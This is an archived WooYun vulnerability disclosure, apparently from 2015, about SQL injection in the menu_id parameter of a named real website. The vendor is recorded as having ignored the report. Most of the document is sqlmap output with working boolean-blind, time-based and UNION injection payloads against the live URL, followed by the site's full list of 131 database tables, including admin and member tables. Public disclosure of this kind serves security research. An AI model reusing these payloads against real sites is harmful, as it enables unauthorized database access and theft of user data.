乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-03: 细节已通知厂商并且等待厂商处理中 2015-11-08: 厂商已经主动忽略漏洞,细节向公众公开
http://tools.transn.com/tools/?act=plist&menu_id=4&v=
sqlmap resumed the following injection point(s) from stored session:---Parameter: menu_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: act=plist&menu_id=4 AND 9626=9626&v= Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: act=plist&menu_id=4 AND (SELECT * FROM (SELECT(SLEEP(5)))CgfP)&v= Type: UNION query Title: Generic UNION query (NULL) - 23 columns Payload: act=plist&menu_id=4 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706b6b71,0x7a637648477a76487142,0x716a716b71),NULL-- &v=---web application technology: Apache 2.2.3, PHP 5.2.17back-end DBMS: MySQL 5.0.12Database: tools[131 tables]+-------------------------+| admin || bbs_access || bbs_activities || bbs_activityapplies || bbs_adminactions || bbs_admincustom || bbs_admingroups || bbs_adminnotes || bbs_adminsessions || bbs_advcaches || bbs_advertisements || bbs_announcements || bbs_attachments || bbs_attachpaymentlog || bbs_attachtypes || bbs_banned || bbs_bbcodes || bbs_caches || bbs_campaigns || bbs_creditslog || bbs_crons || bbs_debateposts || bbs_debates || bbs_failedlogins || bbs_faqs || bbs_favorites || bbs_forumfields || bbs_forumlinks || bbs_forumrecommend || bbs_forums || bbs_imagetypes || bbs_invites || bbs_itempool || bbs_magiclog || bbs_magicmarket || bbs_magics || bbs_medallog || bbs_medals || bbs_memberfields || bbs_membermagics || bbs_members || bbs_members_copy || bbs_memberspaces || bbs_moderators || bbs_modworks || bbs_myposts || bbs_mytasks || bbs_mythreads || bbs_navs || bbs_onlinelist || bbs_onlinetime || bbs_orders || bbs_paymentlog || bbs_pluginhooks || bbs_plugins || bbs_pluginvars || bbs_polloptions || bbs_polls || bbs_posts || bbs_profilefields || bbs_projects || bbs_promotions || bbs_ranks || bbs_ratelog || bbs_regips || bbs_relatedthreads || bbs_reportlog || bbs_request || bbs_rewardlog || bbs_rsscaches || bbs_searchindex || bbs_sessions || bbs_settings || bbs_smilies || bbs_spacecaches || bbs_stats || bbs_statvars || bbs_styles || bbs_stylevars || bbs_subscriptions || bbs_tags || bbs_tasks || bbs_taskvars || bbs_templates || bbs_threads || bbs_threadsmod || bbs_threadtags || bbs_threadtypes || bbs_tradecomments || bbs_tradelog || bbs_tradeoptionvars || bbs_trades || bbs_typemodels || bbs_typeoptions || bbs_typeoptionvars || bbs_typevars || bbs_uc_admins || bbs_uc_applications || bbs_uc_badwords || bbs_uc_domains || bbs_uc_failedlogins || bbs_uc_feeds || bbs_uc_friends || bbs_uc_mailqueue || bbs_uc_memberfields || bbs_uc_members || bbs_uc_mergemembers || bbs_uc_newpm || bbs_uc_notelist || bbs_uc_pms || bbs_uc_protectedmembers || bbs_uc_settings || bbs_uc_sqlcache || bbs_uc_tags || bbs_uc_vars || bbs_usergroups || bbs_validating || bbs_videos || bbs_videotags || bbs_virtualforums || bbs_warnings || bbs_words || category || dtree || handbook || pinglun || sessions || soft || soft_uses_detail || t_shouquan || yonghu |+-------------------------+
危害等级:无影响厂商忽略
忽略时间:2015-11-08 09:50
漏洞Rank:4 (WooYun评价)
暂无
